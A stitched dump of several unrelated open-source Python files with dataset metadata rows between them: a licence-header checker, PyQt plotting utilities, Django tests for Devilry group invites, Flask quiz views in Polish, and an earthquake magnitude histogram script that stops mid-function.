# Skip symlinks (with message)
if filepath.is_symlink():
results.excluded(filepath, "File is a symlink")
continue
# Skip non-file
if not filepath.is_file():
continue
# Skip exclude patterns
if matches_exclude_pattern(config, filepath):
results.excluded(filepath, "Path matches exclude pattern")
continue
check_file_for_licence(all_matchers, results, filepath)
return results
def check_file_for_licence(all_matchers, results, filepath):
matchers = detect_comment_char(all_matchers, filepath.name)
if not matchers:
results.skipped(filepath, "Unknown comment style")
return
if filepath.stat().st_size == 0:
results.skipped(filepath, "Empty file")
return
problems = []
for matcher in matchers:
good, line_num, msg = check_file_with_matcher(matcher, filepath)
if good:
results.passed(filepath, line_num, msg)
return
else:
problems.append((line_num, msg))
# If we get here, we didn't find a matching licence
for line_num, msg in problems:
results.failed(filepath, line_num, msg)
def check_file_with_matcher(matcher, filepath):
'''Check the file at filepath against matcher.
Returns a tuple (is_good, line_number, msg). is_good is True on success;
False on failure. line_number is the position where the licence was found
(on success) or where we gave up searching for it (on failure). msg is the
associated success or error message.
'''
def next_line(file, line_no):
return (next(file).rstrip(), line_no + 1)
with filepath.open() as f:
licence_assumed_start = None
# Get first line
try:
line, line_no = next_line(f, 0)
except StopIteration:
return (False, 1, "Empty file")
# Check first line against the first word of licence, or against a
# possible different first line.
if not matcher.looks_like_first_line(line):
if not matcher.looks_like_first_line_comment(line):
return (False, line_no, "File does not start with comment")
try:
line, line_no = next_line(f, line_no)
except StopIteration:
return (False, line_no,
"Reached end of file before finding licence")
# Skip lines that don't seem to be the first line of the licence
while not matcher.looks_like_first_line(line):
try:
line, line_no = next_line(f, line_no)
except StopIteration:
return (False, line_no,
"Reached end of file before finding licence")
if not matcher.looks_like_comment(line):
return (False, line_no,
"First comment ended before licence notice")
# We found the marker, so we found the first line of the licence. The
# current line is in the first comment, so check the line matches the
# expected first line:
licence_assumed_start = line_no
matcher.start()
matched, done = matcher.take_line(line)
if not matched:
return (False, line_no, "Licence does not match")
while not done:
try:
line, line_no = next_line(f, line_no)
except StopIteration:
return (False, line_no,
"Reached end of file before finding licence")
# Check against full expected line.
matched, done = matcher.take_line(line)
if not matched:
return (False, line_no, "Licence did not match")
return (True, licence_assumed_start, "Licence found")
def main():
desc = "A tool to check the lowRISC licence header is in each source file"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("--config",
metavar="config.hjson",
type=argparse.FileType('r', encoding='UTF-8'),
required=True,
help="HJSON file to read for licence configuration.")
parser.add_argument("paths",
metavar="path",
nargs='*',
default=["."],
help="Paths to check for licence headers.")
parser.add_argument('-v',
"--verbose",
action='store_true',
dest='verbose',
help="Verbose output")
options = parser.parse_args()
if options.verbose:
logging.basicConfig(format="%(levelname)s: %(message)s",
level=logging.INFO)
else:
logging.basicConfig(format="%(levelname)s: %(message)s")
config = SimpleNamespace()
config.base_dir = git_find_repo_toplevel()
parsed_config = hjson.load(options.config)
config.licence = LicenceHeader(parsed_config['licence'])
config.exclude_paths = set(parsed_config['exclude_paths'])
# Check whether we should use regex matching or full string matching.
match_regex = parsed_config.get('match_regex', 'false')
if match_regex not in ['true', 'false']:
print('Invalid value for match_regex: {!r}. '
'Should be "true" or "false".'.format(match_regex))
exit(1)
config.match_regex = match_regex == 'true'
results = check_paths(config, options.paths)
print(results.display_nicely())
if results.any_failed():
print("Failed:")
for path in results.failing_paths:
print(" {}".format(str(path)))
print("")
exit(1)
else:
exit(0)
if __name__ == '__main__':
main()
| apache-2.0 | -6,870,868,201,439,118,000 | 33.276596 | 100 | 0.596524 | false |
jithinbp/vLabtool-v0 | v0/utilitiesClass.py | 1 | 2985 | import time,random,functools
import numpy as np
from PyQt4 import QtCore, QtGui
import pyqtgraph as pg
import pyqtgraph.opengl as gl
class utilitiesClass():
"""
This class contains methods that simplify setting up and running
an experiment.
"""
timers=[]
viewBoxes=[]
plots3D=[]
plots2D=[]
axisItems=[]
total_plot_areas=0
def __init__(self):
pass
def updateViews(self,plot):
for a in plot.viewBoxes:
a.setGeometry(plot.getViewBox().sceneBoundingRect())
a.linkedViewChanged(plot.plotItem.vb, a.XAxis)
def random_color(self):
c=QtGui.QColor(random.randint(20,255),random.randint(20,255),random.randint(20,255))
if np.average(c.getRgb())<150:
c=self.random_color()
return c
def add2DPlot(self,plot_area):
plot=pg.PlotWidget()
plot.setMinimumHeight(250)
plot_area.addWidget(plot)
plot.viewBoxes=[]
self.plots2D.append(plot)
return plot
def add3DPlot(self,plot_area):
plot3d = gl.GLViewWidget()
#gx = gl.GLGridItem();gx.rotate(90, 0, 1, 0);gx.translate(-10, 0, 0);self.plot.addItem(gx)
#gy = gl.GLGridItem();gy.rotate(90, 1, 0, 0);gy.translate(0, -10, 0);self.plot.addItem(gy)
gz = gl.GLGridItem();#gz.translate(0, 0, -10);
plot3d.addItem(gz);
plot3d.opts['distance'] = 40
plot3d.opts['elevation'] = 5
plot3d.opts['azimuth'] = 20
plot3d.setMinimumHeight(250)
plot_area.addWidget(plot3d)
self.plots3D.append(plot3d)
plot3d.plotLines3D=[]
return plot3d
def addCurve(self,plot,name='',col=(255,255,255),axis='left'):
#if(len(name)):curve = plot.plot(name=name)
#else:curve = plot.plot()
if(len(name)):curve = pg.PlotCurveItem(name=name)
else:curve = pg.PlotCurveItem()
plot.addItem(curve)
curve.setPen(color=col, width=1)
return curve
def rebuildLegend(self,plot):
return plot.addLegend(offset=(-10,30))
def addAxis(self,plot,**args):
p3 = pg.ViewBox()
ax3 = pg.AxisItem('right')
plot.plotItem.layout.addItem(ax3, 2, 3+len(self.axisItems))
plot.plotItem.scene().addItem(p3)
ax3.linkToView(p3)
p3.setXLink(plot.plotItem)
ax3.setZValue(-10000)
if args.get('label',False):
ax3.setLabel(args.get('label',False), color=args.get('color','#ffffff'))
plot.viewBoxes.append(p3)
p3.setGeometry(plot.plotItem.vb.sceneBoundingRect())
p3.linkedViewChanged(plot.plotItem.vb, p3.XAxis)
## Handle view resizing
Callback = functools.partial(self.updateViews,plot)
plot.getViewBox().sigStateChanged.connect(Callback)
self.axisItems.append(ax3)
return p3
def loopTask(self,interval,func,*args):
timer = QtCore.QTimer()
timerCallback = functools.partial(func,*args)
timer.timeout.connect(timerCallback)
timer.start(interval)
self.timers.append(timer)
return timer
def delayedTask(self,interval,func,*args):
timer = QtCore.QTimer()
timerCallback = functools.partial(func,*args)
timer.singleShot(interval,timerCallback)
self.timers.append(timer)
def displayDialog(self,txt=''):
QtGui.QMessageBox.about(self, 'Message', txt)
| gpl-3.0 | -7,986,475,858,903,219,000 | 25.651786 | 92 | 0.710218 | false |
devilry/devilry-django | devilry/apps/core/tests/test_groupinvite.py | 1 | 24874 | from django.core import mail
from django.core.exceptions import ValidationError
from django.test import TestCase
from django.utils import timezone
from django.utils.timezone import timedelta
from django.urls import reverse
from model_bakery import baker
from devilry.apps.core import devilry_core_baker_factories as core_baker
from devilry.apps.core.models import AssignmentGroup
from devilry.apps.core.models import GroupInvite
from devilry.devilry_dbcache.customsql import AssignmentGroupDbCacheCustomSql
class TestGroupInviteErrors(TestCase):
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_user_sending_is_not_part_of_the_group(self):
testgroup = baker.make('core.AssignmentGroup')
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
testgroup2 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup1).relatedstudent.user
sent_to = core_baker.candidate(testgroup2).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'The user sending an invite must be a Candiate on the group.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_student_already_member_of_the_group(self):
testgroup = baker.make('core.AssignmentGroup')
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'The student is already a member of the group.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_student_already_invited_but_not_responded(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to)
with self.assertRaisesMessage(
ValidationError,
'The student is already invited to join the group, but they have not responded yet.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_create_groups_expired(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__students_can_create_groups=True,
parentnode__students_can_not_create_groups_after=timezone.now() - timedelta(days=1))
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'Creating project groups without administrator approval is not '
'allowed on this assignment anymore. Please contact you course '
'administrator if you think this is wrong.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_assignment_does_not_allow_students_to_form_groups(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__students_can_create_groups=False)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'This assignment does not allow students to form project groups on their own.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_student_sent_to_is_not_registerd_on_assignment(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup')
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'The invited student is not registered on this assignment.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_student_sent_to_is_already_in_a_group_with_more_than_one_student(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
core_baker.candidate(testgroup1)
with self.assertRaisesMessage(
ValidationError,
'The invited student is already in a project group with more than 1 students.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to,
accepted=True
)
invite.full_clean()
def test_sanity(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
self.assertEqual(invite.sent_to, sent_to)
self.assertEqual(invite.sent_by, sent_by)
self.assertEqual(invite.group, testgroup)
self.assertIsNotNone(invite.sent_datetime)
def test_sanity_accepted(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to,
accepted=True
)
invite.full_clean()
self.assertEqual(invite.sent_to, sent_to)
self.assertEqual(invite.sent_by, sent_by)
self.assertEqual(invite.group, testgroup)
self.assertTrue(invite.accepted)
self.assertIsNotNone(invite.responded_datetime)
class TestGroupInviteQueryset(TestCase):
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_queryset_sanity(self):
baker.make('core.GroupInvite', id=100)
self.assertEqual(GroupInvite.objects.all().first().id, 100)
def test_filter_accepted(self):
baker.make('core.GroupInvite', accepted=None, id=10)
baker.make('core.GroupInvite', accepted=False, id=11)
baker.make('core.GroupInvite', accepted=True, id=100)
baker.make('core.GroupInvite', accepted=True, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_accepted()),
{100, 101}
)
def test_filter_no_response(self):
baker.make('core.GroupInvite', accepted=None, id=10)
baker.make('core.GroupInvite', accepted=None, id=11)
baker.make('core.GroupInvite', accepted=True, id=100)
baker.make('core.GroupInvite', accepted=False, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_no_response()),
{10, 11}
)
def test_filter_rejected(self):
baker.make('core.GroupInvite', accepted=False, id=10)
baker.make('core.GroupInvite', accepted=False, id=11)
baker.make('core.GroupInvite', accepted=True, id=100)
baker.make('core.GroupInvite', accepted=None, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_rejected()),
{10, 11}
)
def test_filter_unanswered_received_invites(self):
group = baker.make('core.AssignmentGroup')
sent_by = core_baker.candidate(group=group).relatedstudent.user
sent_to = core_baker.candidate(group=group).relatedstudent.user
baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=False, id=10)
baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=None, id=11)
baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=True, id=100)
baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=None, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_unanswered_received_invites(sent_to)),
{11, 101}
)
def test_filter_unanswered_sent_invites(self):
group = baker.make('core.AssignmentGroup')
baker.make('core.GroupInvite', group=group, accepted=False, id=10)
baker.make('core.GroupInvite', group=group, accepted=None, id=11)
baker.make('core.GroupInvite', group=group, accepted=True, id=100)
baker.make('core.GroupInvite', group=group, accepted=None, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_unanswered_sent_invites(group)),
{11, 101}
)
def test_filter_allowed_to_create_groups(self):
assignment_expired = baker.make(
'core.Assignment',
students_can_create_groups=True,
students_can_not_create_groups_after=timezone.now() - timedelta(days=1)
)
assignment_not_expired = baker.make(
'core.Assignment',
students_can_create_groups=True,
students_can_not_create_groups_after=timezone.now() + timedelta(days=1)
)
assignment_not_allowed = baker.make('core.Assignment', students_can_create_groups=False)
assignment_allowed = baker.make('core.Assignment', students_can_create_groups=True)
group1 = baker.make('core.AssignmentGroup', parentnode=assignment_expired)
group2 = baker.make('core.AssignmentGroup', parentnode=assignment_not_expired)
group3 = baker.make('core.AssignmentGroup', parentnode=assignment_not_allowed)
group4 = baker.make('core.AssignmentGroup', parentnode=assignment_allowed)
baker.make('core.GroupInvite', group=group1, id=10)
baker.make('core.GroupInvite', group=group2, id=11)
baker.make('core.GroupInvite', group=group3, id=100)
baker.make('core.GroupInvite', group=group4, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_allowed_to_create_groups()),
{11, 101}
)
class FakeRequest(object):
def build_absolute_uri(self, location):
return 'http://example.com{}'.format(location)
class GroupInviteRespond(TestCase):
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def __fake_request(self):
return FakeRequest()
def test_respond_reject(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
student1 = core_baker.candidate(group=group1).relatedstudent.user
student2 = core_baker.candidate(group=group2).relatedstudent.user
invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1)
invite.respond(False)
self.assertFalse(GroupInvite.objects.get(id=invite.id).accepted)
group = AssignmentGroup.objects.filter_user_is_candidate(student2)
self.assertEqual(group.count(), 1)
self.assertEqual(group.first().id, group2.id)
def test_respond_accept(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
student1 = core_baker.candidate(group=group1).relatedstudent.user
student2 = core_baker.candidate(group=group2).relatedstudent.user
invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1)
invite.respond(True)
self.assertTrue(GroupInvite.objects.get(id=invite.id).accepted)
group = AssignmentGroup.objects.filter_user_is_candidate(student2)
self.assertEqual(group.count(), 1)
self.assertEqual(group.first().id, group1.id)
self.assertEqual(group.first().cached_data.candidate_count, 2)
self.assertFalse(AssignmentGroup.objects.filter(id=group2.id).exists())
def test_num_queries_accept(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
student1 = core_baker.candidate(group=group1).relatedstudent.user
student2 = core_baker.candidate(group=group2).relatedstudent.user
invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1)
with self.assertNumQueries(36):
invite.respond(True)
def test_num_queries_reject(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
student1 = core_baker.candidate(group=group1).relatedstudent.user
student2 = core_baker.candidate(group=group2).relatedstudent.user
invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1)
with self.assertNumQueries(9):
invite.respond(False)
def test_send_invite_mail(self):
assignment = baker.make(
'core.Assignment',
long_name='Assignment 1',
short_name='assignment1',
parentnode__long_name='Spring2017',
parentnode__short_name='s17',
parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming',
parentnode__parentnode__short_name='Duck1010',
students_can_create_groups=True,
)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment)
sent_by = core_baker.candidate(testgroup, shortname="[email protected]", fullname="April").relatedstudent.user
sent_to = core_baker.candidate(testgroup1, shortname="[email protected]", fullname="Dewey").relatedstudent.user
baker.make('devilry_account.UserEmail', user=sent_to, email="[email protected]")
invite = GroupInvite(group=testgroup, sent_by=sent_by, sent_to=sent_to)
invite.full_clean()
invite.save()
request = self.__fake_request()
invite.send_invite_notification(request)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, '[Devilry] Project group invite for Duck1010.s17.assignment1')
url = request.build_absolute_uri(
reverse('devilry_student_groupinvite_respond', kwargs={'invite_id': invite.id}))
self.assertIn(url, mail.outbox[0].body)
def test_send_reject_mail(self):
assignment = baker.make(
'core.Assignment',
long_name='Assignment 1',
short_name='assignment1',
parentnode__long_name='Spring2017',
parentnode__short_name='s17',
parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming',
parentnode__parentnode__short_name='Duck1010',
students_can_create_groups=True,
)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment)
sent_by = core_baker.candidate(testgroup, shortname="[email protected]", fullname="April").relatedstudent.user
sent_to = core_baker.candidate(testgroup1, shortname="[email protected]", fullname="Dewey").relatedstudent.user
baker.make('devilry_account.UserEmail', user=sent_to, email="[email protected]")
baker.make('devilry_account.UserEmail', user=sent_by, email="[email protected]")
invite = GroupInvite(
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
invite.save()
invite.send_invite_notification(self.__fake_request())
invite.respond(False)
self.assertEqual(len(mail.outbox), 2)
self.assertEqual(mail.outbox[1].subject, '[Devilry] Dewey rejected your project group invite')
def test_send_accept_mail(self):
assignment = baker.make(
'core.Assignment',
long_name='Assignment 1',
short_name='assignment1',
parentnode__long_name='Spring2017',
parentnode__short_name='s17',
parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming',
parentnode__parentnode__short_name='Duck1010',
students_can_create_groups=True,
)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment)
sent_by = core_baker.candidate(testgroup, shortname="[email protected]", fullname="April").relatedstudent.user
sent_to = core_baker.candidate(testgroup1, shortname="[email protected]", fullname="Dewey").relatedstudent.user
baker.make('devilry_account.UserEmail', user=sent_to, email="[email protected]")
baker.make('devilry_account.UserEmail', user=sent_by, email="[email protected]")
invite = GroupInvite(
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
invite.save()
invite.send_invite_notification(self.__fake_request())
invite.respond(True)
self.assertEqual(len(mail.outbox), 2)
self.assertEqual(mail.outbox[1].subject, '[Devilry] Dewey accepted your project group invite')
def test_send_invite_to_choices_queryset(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
group3 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
group4 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
core_baker.candidate(group=group1, fullname="Louie", shortname="louie")
core_baker.candidate(group=group2, fullname="Huey", shortname="huey")
core_baker.candidate(group=group2, fullname="Donald", shortname="donald")
candidate4 = core_baker.candidate(group=group3, fullname="April", shortname="april")
candidate5 = core_baker.candidate(group=group4, fullname="Dewey", shortname="dewey")
candidates = GroupInvite.send_invite_to_choices_queryset(group1)
self.assertEqual(candidates.count(), 2)
self.assertEqual(
set(candidate.id for candidate in candidates),
{candidate4.id, candidate5.id}
)
def test_send_invite_to_choices_queryset_pending_is_excluded(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
group3 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
group4 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
candidate1 = core_baker.candidate(group=group1, fullname="Louie", shortname="louie")
core_baker.candidate(group=group2, fullname="Huey", shortname="huey")
core_baker.candidate(group=group2, fullname="Donald", shortname="donald")
candidate4 = core_baker.candidate(group=group3, fullname="April", shortname="april")
candidate5 = core_baker.candidate(group=group4, fullname="Dewey", shortname="dewey")
baker.make(
'core.GroupInvite',
group=group1,
sent_to=candidate4.relatedstudent.user,
sent_by=candidate1.relatedstudent.user
)
candidates = GroupInvite.send_invite_to_choices_queryset(group1)
self.assertEqual(candidates.count(), 1)
self.assertEqual(
set(candidate.id for candidate in candidates),
{candidate5.id}
)
def test_validate_user_id_send_to(self):
assignment = baker.make('core.Assignment', students_can_create_groups=True)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment)
core_baker.candidate(testgroup)
sent_to = core_baker.candidate(testgroup1)
with self.assertNumQueries(1):
GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id)
def test_validation_user_id_send_to_error_wrong_assignment(self):
assignment = baker.make('core.Assignment', students_can_create_groups=True)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup')
core_baker.candidate(testgroup)
sent_to = core_baker.candidate(testgroup1)
with self.assertRaisesMessage(ValidationError, 'The selected student is not eligible to join the group.'):
GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id)
def test_validation_user_id_send_to_error_already_in_group(self):
assignment = baker.make('core.Assignment', students_can_create_groups=True)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
core_baker.candidate(testgroup)
sent_to = core_baker.candidate(testgroup)
with self.assertRaisesMessage(ValidationError, 'The selected student is not eligible to join the group.'):
GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id)
def test_invite_has_already_been_accepted(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
invite = baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to, accepted=True)
with self.assertRaisesMessage(ValidationError, 'This invite has already been accepted.'):
invite.respond(True)
def test_invite_has_already_been_declined(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
invite = baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to, accepted=False)
with self.assertRaisesMessage(ValidationError, 'This invite has already been declined.'):
invite.respond(False)
| bsd-3-clause | -7,695,764,086,700,360,000 | 48.947791 | 119 | 0.659564 | false |
koduj-z-klasa/python101 | docs/webflask/quiz_orm/quiz2_pw/views.py | 1 | 4117 | # -*- coding: utf-8 -*-
# quiz-orm/views.py
from flask import render_template, request, redirect, url_for, abort, flash
from app import app
from models import Pytanie, Odpowiedz
from forms import *
@app.route('/')
def index():
"""Strona główna"""
return render_template('index.html')
@app.route('/lista')
def lista():
"""Pobranie wszystkich pytań z bazy i zwrócenie szablonu z listą pytań"""
pytania = Pytanie().select().annotate(Odpowiedz)
if not pytania.count():
flash('Brak pytań w bazie.', 'kom')
return redirect(url_for('index'))
return render_template('lista.html', pytania=pytania)
@app.route('/quiz', methods=['GET', 'POST'])
def quiz():
"""Wyświetlenie pytań i odpowiedzi w formie quizu oraz ocena poprawności
przesłanych odpowiedzi"""
if request.method == 'POST':
wynik = 0
for pid, odp in request.form.items():
odpok = Pytanie.select(Pytanie.odpok).where(
Pytanie.id == int(pid)).scalar()
if odp == odpok:
wynik += 1
flash('Liczba poprawnych odpowiedzi, to: {0}'.format(wynik), 'sukces')
return redirect(url_for('index'))
    # GET: display the questions
pytania = Pytanie().select().annotate(Odpowiedz)
if not pytania.count():
flash('Brak pytań w bazie.', 'kom')
return redirect(url_for('index'))
return render_template('quiz.html', pytania=pytania)
def flash_errors(form):
"""Odczytanie wszystkich błędów formularza i przygotowanie komunikatów"""
for field, errors in form.errors.items():
for error in errors:
if type(error) is list:
error = error[0]
flash("Błąd: {}. Pole: {}".format(
error,
getattr(form, field).label.text))
@app.route('/dodaj', methods=['GET', 'POST'])
def dodaj():
"""Dodawanie pytań i odpowiedzi"""
form = DodajForm()
if form.validate_on_submit():
odp = form.odpowiedzi.data
p = Pytanie(pytanie=form.pytanie.data, odpok=odp[int(form.odpok.data)])
p.save()
for o in odp:
inst = Odpowiedz(pnr=p.id, odpowiedz=o)
inst.save()
flash("Dodano pytanie: {}".format(form.pytanie.data))
return redirect(url_for("lista"))
elif request.method == 'POST':
flash_errors(form)
return render_template("dodaj.html", form=form, radio=list(form.odpok))
def get_or_404(pid):
"""Pobranie i zwrócenie obiektu z bazy lub wywołanie szablonu 404.html"""
try:
p = Pytanie.select().annotate(Odpowiedz).where(Pytanie.id == pid).get()
return p
except Pytanie.DoesNotExist:
abort(404)
@app.errorhandler(404)
def page_not_found(e):
"""Zwrócenie szablonu 404.html w przypadku nie odnalezienia strony"""
return render_template('404.html'), 404
@app.route('/edytuj/<int:pid>', methods=['GET', 'POST'])
def edytuj(pid):
"""Edycja pytania o identyfikatorze pid i odpowiedzi"""
p = get_or_404(pid)
form = DodajForm()
if form.validate_on_submit():
odp = form.odpowiedzi.data
p.pytanie = form.pytanie.data
p.odpok = odp[int(form.odpok.data)]
p.save()
for i, o in enumerate(p.odpowiedzi):
o.odpowiedz = odp[i]
o.save()
flash("Zaktualizowano pytanie: {}".format(form.pytanie.data))
return redirect(url_for("lista"))
elif request.method == 'POST':
flash_errors(form)
for i in range(3):
if p.odpok == p.odpowiedzi[i].odpowiedz:
p.odpok = i
break
form = DodajForm(obj=p)
return render_template("edytuj.html", form=form, radio=list(form.odpok))
@app.route('/usun/<int:pid>', methods=['GET', 'POST'])
def usun(pid):
"""Usunięcie pytania o identyfikatorze pid"""
p = get_or_404(pid)
if request.method == 'POST':
flash('Usunięto pytanie {0}'.format(p.pytanie), 'sukces')
p.delete_instance(recursive=True)
return redirect(url_for('index'))
return render_template("pytanie_usun.html", pytanie=p)
| mit | 5,689,004,494,325,511,000 | 30.236641 | 79 | 0.611193 | false |
PyQuake/earthquakemodels | code/runExperiments/histogramMagnitude.py | 1 | 1982 | import matplotlib.pyplot as plt
import models.model as model
import earthquake.catalog as catalog
from collections import OrderedDict
def histogramMagnitude(catalog_, region):
"""
    Creates the histogram of magnitudes for a given region.
    Saves the histogram to the following path: ./code/Zona2/histograms/<region>/Magnitude Histogram of <year> <region>.png
    where region is supplied by the caller and year runs from 2000 to 2011.
"""
definition = model.loadModelDefinition('../params/' + region + '.txt')
catalogFiltred = catalog.filter(catalog_, definition)
year = 2000
while(year < 2012):
data = dict()
for i in range(len(catalogFiltred)):
if catalogFiltred[i]['year'] == year and catalogFiltred[i]['lat'] > 34.8 and catalogFiltred[i][
'lat'] < 37.05 and catalogFiltred[i]['lon'] > 138.8 and catalogFiltred[i]['lon'] < 141.05:
data[catalogFiltred[i]['mag']] = data.get(catalogFiltred[i]['mag'], 0) + 1
b = OrderedDict(sorted(data.items()))
plt.title('Histogram of ' + str(year) + " " + region)
plt.bar(range(len(data)), b.values(), align='center')
plt.xticks(range(len(data)), b.keys(), rotation=25)
# print(b)
        plt.savefig(
            '../Zona2/histograms/'+region+'/Magnitude Histogram of ' +
            str(year) +
            " " +
            region +
            '.png')
        plt.clf()  # clear the figure so bars and titles do not accumulate across years
        del data
year += 1
def main():
"""
Calls function to plot a hitogram of magnitudes by region, based on JMA catalog
"""
catalog_ = catalog.readFromFile('../data/jmacat_2000_2013.dat')
region = "Kanto"
